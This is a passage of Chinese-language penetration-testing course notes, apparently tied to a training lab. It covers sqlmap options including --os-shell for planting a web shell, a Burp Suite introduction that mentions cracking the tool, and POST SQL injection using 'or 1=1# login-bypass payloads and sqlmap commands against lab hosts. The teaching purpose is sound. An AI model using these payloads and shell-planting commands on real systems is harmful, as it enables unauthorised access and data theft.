常见指令:
--random-agent 选择随机user-agents头
--delay=1 每次探测延时1秒(防止访问过快被ban)
--count 查看数据量
--proxy ":1080" 使用本地1080端口
--level 1-5 测试等级(最低1,最高5) level等级越高检测越详细,例如 level大于2会检测cookie注入,大于3会检测头注入
--is-dba 查询当前用户权限,如果DBA是True可以尝试直接拿webshell
--os-shell尝试往网站中放入一个cmdshell(就是拥有cmd权限的shell),先选择写入shell的脚本语言 sqlmap -u \'http://shop.aqlab.cn:8001/single.php?id=1\' --os-shell
有的需要填写网站的web目录的绝对路径,有的可以直接选择好shell的脚本语言类型就可以直接拿shell
3.Burpsuite工具的基础使用Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。
我们先进行安装把工具装好,如果遇到破解问题可以看我的帖子
https://www.zkaq.org/t/2178.html
插件可以帮助我们更好的对浏览器进行操作,例如Proxy SwitchySharp插件可以帮助我快速的使用代理
安装浏览器插件的文章地址:https://www.zkaq.org/t/3683.html
4-3POST注入HEAD头注入 一、POST注入介绍POST\GET两种传参方式
GET传参的数据有限,比较少,会经过URL编码
POST传参的数据可以比较大,可以上传文件,不会经过URL编码
POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别
POST注入高危点:
登录框
查询框
等各种和数据库有交互的框
最经典的POST注入莫过于万能密码
\'or 1=1#
二、POST注入靶场的做法POST注入(一)
select *from user where username =\'\' and password=\'\'
\'or 1=1#
POST注入(二)
select *from user where username =("") and password=("")
") or 1=1 #
Sqlmap如何对POST类型SQL注入进行注入
--forms sqlmap去读取页面中POST传参的表单的传参名然后进行SQL注入
-level 测试等级
sqlmap -u \'http://inject2.lab.aqlab.cn:81/Pass-06/index.php\' --forms --level 3-r 1.txt sqlmap读取数据包文件进行SQL注入,注入处可以打一个*号告诉Sqlmap测试那个点
sqlmap -r 1.txt --level 3 三、Head注入介绍PHP 全局变量 - 超全局变量
PHP 中的许多预定义变量都是“超全局的”,这意味着它们在一个脚本的全部作用域中都可用。